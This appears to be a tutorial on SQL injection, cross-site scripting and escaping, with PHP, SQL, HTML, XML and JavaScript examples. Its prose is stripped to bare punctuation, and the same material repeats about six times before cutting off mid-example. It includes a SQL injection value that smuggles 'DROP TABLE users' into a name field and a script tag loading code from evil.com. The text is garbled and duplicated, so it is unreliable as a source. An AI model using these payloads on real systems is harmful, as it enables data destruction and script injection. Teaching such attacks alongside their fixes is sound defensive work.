$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
